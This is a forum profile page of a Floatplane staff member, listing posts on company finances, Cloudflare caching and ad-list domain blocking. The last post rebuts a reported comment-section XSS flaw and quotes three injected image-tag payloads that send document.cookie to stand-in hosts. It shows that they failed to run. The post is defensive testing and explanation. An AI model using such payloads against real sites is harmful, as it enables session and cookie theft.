Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

AJJaxNet

Floatplane Staff
  • Content Count

    375
  • Joined

  • Last visited

Awards


About AJJaxNet

  • Title
    Member
  • Birthday 1996-11-25

Contact Methods

  • Twitter
    https://twitter.com/AJJaxNet

Profile Information

  • Gender
    Male
  • Location
    Montreal, QC, Canada
  • Interests
    PC ¦ Software Development ¦ Projects ¦ LAN Party
  • Occupation
    Programmer

System

  • CPU
    intel i7 3770k @ 4.3Ghz
  • Motherboard
    MSI Z77 MPOWER
  • RAM
    16Gb - Patriot Viper 3 DDR3-2133
  • GPU
    EVGA GeForce GTX 980 Ti SC GAMING ACX 2.0+
  • Mouse
    Razer Ouroboros

Recent Profile Visitors

3,546 profile views
  1. AJJaxNet

    How much does LMG make from sponsors?

    That the company is bringing in more money than it's spending on employees salary and operations (building, servers, electricity, etc). At the end of the year, the balance sheet is positive.
  2. AJJaxNet

    How much does LMG make from sponsors?

    Aren't vacation time paid where you're at? ^^
  3. AJJaxNet

    Questions About CloudFlare

    I'm pretty sure that if the path extension to your page ends in ".html", it will cache it since it means it's a static ressource. If it doesn't have an extension or something like ".php", cloudflare will forward the request to your server every single time.
  4. AJJaxNet

    Questions About CloudFlare

    The way Cloudflare works is just servers that sit between the users and your webserver(s). Your website is not actually hosted at cloudflare, but they're accelerating it by caching static resources from your website (scripts, images, fonts and more). So it won't actually remove a ton of load from your server if it's a dynamic website but it will still help since your server wont serve has many of the static content.
  5. AJJaxNet

    float plane missing

    We had a minor outage, should all work again ^^
  6. AJJaxNet

    High gain wifi antennas

    Depending on the performance you need, you could get a 100Mbps ubiquiti bridge for ~100$ (https://www.amazon.com/Ubiquiti-Networks-Litebeam-Wireless-LBE-M5-23-US/dp/B015GWT42G/ref=mp_s_a_1_4?ie=UTF8&qid=1529039052&sr=8-4&pi=AC_SX236_SY340_FMwebp_QL65&keywords=litebeam&dpPl=1&dpID=41LSj7GirLL&ref=plSrch) For 20$ more you can get 400Mbps with the AC version.
  7. AJJaxNet

    FloatPlane Censorship

    The reason Youtube won't actually allow a ton of stuff is because they need to be advertiser friendly to work with their business model. Floatplane doesn't actually run off ads so I don't see why we would restrict what creators want to do on the platform (if it's legal, of course), the only person that the creator can hurt is themselves (ex: Losing subscription because the audience doesn't agree)
  8. @a7mddiaa From the Community Guidelines : FYI
  9. Was implemented due to PopAds abusing their domains, sure it was a bit heavy handed (they basically have revolving domain names), As you see they register garbage domain names.

     

    We initially trialed out block of .bid domains (this was the first set of domains that was being was being blocked), PopAds then decided to abuse the .club domains, when we blocked this and start doing the same thing.

     

    All we blocked was a certain type of request from these domains (third-party script requests only). Basically the rarity of .bid and club domains, I thought it wouldn't affect anyone.

    I didn't relise you guys used the .club domain. My apologies.

  10. AJJaxNet

    Floatplane not loading.

    @FanboyNZ Hi ^^ Last night, I had to actually change our CDN domain to a new one (floatplanecdn.com) to make sure this wouldn't happen again or on another list. I still can't believe that Easylist decided to ban scripts from an entire top-level domain without any trace to why this entry was implemented. Thank you for your assistance
  11. AJJaxNet

    What are the basics of server hardware?

    Hi, You should really look into hosting it online using a VPS or a mutual hosting service instead than on premise. In the end it's going to be way cheaper and better network performance than if you try to host it yourself.
  12. AJJaxNet

    Floatplane not loading.

    You said? It's the damned autocorrector...
  13. AJJaxNet

    Floatplane not loading.

    @dronebynsa You're not subscribed to the floatplaneclub for neither LTT or bitwit, so that's why you're not seeing anything. It's working has intended.
  14. In order to steal the cookies the way you described it, you need to be able to execute some javascript code on the client, and like I explained before, Angular will prevent this since it's a huge security risk to allow code execution from a request. Just to make sure that my theory wasn't flawed, I rolled back the client app to test it out the way described in the stackexchange page : https://www.floatplane.com/video/dmXfe12Cl5 Here's all 3 comments that have code's injected to try and steal the cookies : {"id":"5a399e044b928df7473882d8","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:17:24.217Z","editDate":"2017-12-19T23:17:24.217Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}, {"id":"5a399d9a4b928df7473882d7","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.test.com/?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:15:38.346Z","editDate":"2017-12-19T23:15:38.346Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}, {"id":"5a399d34a728aad8338a176d","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=\"https://test.test.com/test.jpg?c=' + document.cookie + '\" />","replying":null,"postDate":"2017-12-19T23:13:56.708Z","editDate":"2017-12-19T23:13:56.708Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}} If I check the request from the browser, I get : https://www.floatplane.com/x https://test.test.com/test.jpg?c=%27%20+%20document.cookie%20+%20%27 No cookie actually got into the URL since the javascript code never got interpreted.
×